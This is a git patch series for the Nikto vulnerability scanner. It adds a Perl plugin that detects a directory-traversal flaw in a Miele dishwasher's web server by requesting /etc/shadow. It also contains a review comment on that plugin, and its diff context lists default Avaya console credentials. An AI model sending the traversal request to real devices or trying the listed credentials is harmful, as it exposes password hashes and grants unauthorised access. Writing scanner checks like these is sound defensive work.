From ef61810c2463e3c05b7f63bef5afa9d0e9af24a5 Mon Sep 17 00:00:00 2001
From: Jeremy Bae
Date: Thu, 30 Mar 2017 14:40:12 +0900
Subject: [PATCH 1/3] Add dish washer directory traversal check plugin
---
 program/plugins/nikto_dishwasher.plugin | 45 +++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 program/plugins/nikto_dishwasher.plugin
diff --git a/program/plugins/nikto_dishwasher.plugin b/program/plugins/nikto_dishwasher.plugin
new file mode 100644
index 00000000..e9ae5b05
--- /dev/null
+++ b/program/plugins/nikto_dishwasher.plugin
@@ -0,0 +1,45 @@
+#VERSION,2.20
+###############################################################################
+# Copyright (C) 2017 Chris Sullo
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; version 2
+# of the License only.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to
+# Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+###############################################################################
+# PURPOSE:
+# Check for the Miele Professional PG 8528 directory traversal vulnerability
+###############################################################################
+sub nikto_dishwasher_init {
+ my $id = { name => "dishwasher",
+ full_name => "dishwasher",
+ author => "Jeremy Bae",
+ description => "Look for the dishwasher directory traversal vulnerability.",
+ hooks => { scan => { method => \&nikto_dishwasher, weight => 20 }, },
+ copyright => "2017 Chris Sullo",
+ };
+
+ return $id;
+}
+
+sub nikto_dishwasher {
+ my ($mark, $parameters) = @_;
+ my $path = "/../../../../../../../../../../../../etc/shadow";
+
+ my ($res, $content, $error, $request, $response) = nfetch($mark, $path, "GET", "", "", "", "dishwasher");
+
+ if (($response->{'server'} =~ 'PST10 WebServer') && ($content =~ 'root:\$1\$.*')) {
+ add_vulnerability($mark, "$path: Site appears vulnerable to the dishwasher directory traversal vulnerability.", 999951, 0, "GET", $path, $request, $response);
+ }
+}
+
+1;
From 32ef144d22503e708dc2b7eb58ba6195d7ce7a5f Mon Sep 17 00:00:00 2001
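Review bot: The condition in `nikto_dishwasher` matches on `$response->{'server'}` without checking that the header is present, and `$error` from `nfetch` is never looked at, so a host that returns no Server header (or a fetch that fails) reaches the pattern match with an undefined value. A guard such as `return unless defined $response->{'server'} && defined $content;` ahead of the `if` would keep the check quiet on those hosts. The content pattern `'root:\$1\$.*'` is unanchored and only recognises an MD5-crypt root entry; `$content =~ /^root:\$1\$/m` would be less likely to fire on a page that merely echoes the string, and a root entry with a different hash prefix would still go unreported either way. The finding text also drops the device name and the seclists advisory link that the db_tests entry removed in patch 2/3 carried; restoring "Miele Professional PG 8528" and the reference in the `add_vulnerability` message would make the result easier to triage from a report.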
From: Jeremy Bae
Date: Thu, 30 Mar 2017 14:44:31 +0900
Subject: [PATCH 2/3] Remove dishwasher check pattern from db_tests
---
 program/databases/db_tests | 1 -
 1 file changed, 1 deletion(-)
diff --git a/program/databases/db_tests b/program/databases/db_tests
index 284376fd..549c9644 100644
--- a/program/databases/db_tests
+++ b/program/databases/db_tests
@@ -6848,4 +6848,3 @@
 "007157","0","e","/WebLM/","GET","Web License Manager (WebLM)","","Avaya","","","Avaya license managing console found. Default credential is admin:weblmadmin","",""
 "007158","0","e","/g450.html","GET","Avaya G450/G350 - Avaya Device Management","","routerIp","","","Avaya web console found. Default SNMP community string is public","",""
 "007159","0","e","/local-login/","GET","Unified Communications Management","","Avaya","","","Avaya System Manager web console found. Default credential is admin:admin","",""
-"007160","0","7","/../../../../../../../../../../../../etc/shadow","GET","root:\$1\$.*","","","","","Miele Professional PG 8528 directory traversal. See http://seclists.org/fulldisclosure/2017/Mar/63","",""
From 7ceca570b3eb50125e063903b2d529983b9282fc Mon Sep 17 00:00:00 2001
From: Jeremy Bae
Date: Wed, 5 Apr 2017 12:00:05 +0900
Subject: [PATCH 3/3] Add ctags file
---
 .gitignore | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.gitignore b/.gitignore
index aa391fe6..5645f889 100644
--- a/.gitignore
+++ b/.gitignore
@@ -3,3 +3,4 @@
 /*.bbprojectd/
 *.sublime-project
 *.sublime-workspace
+tags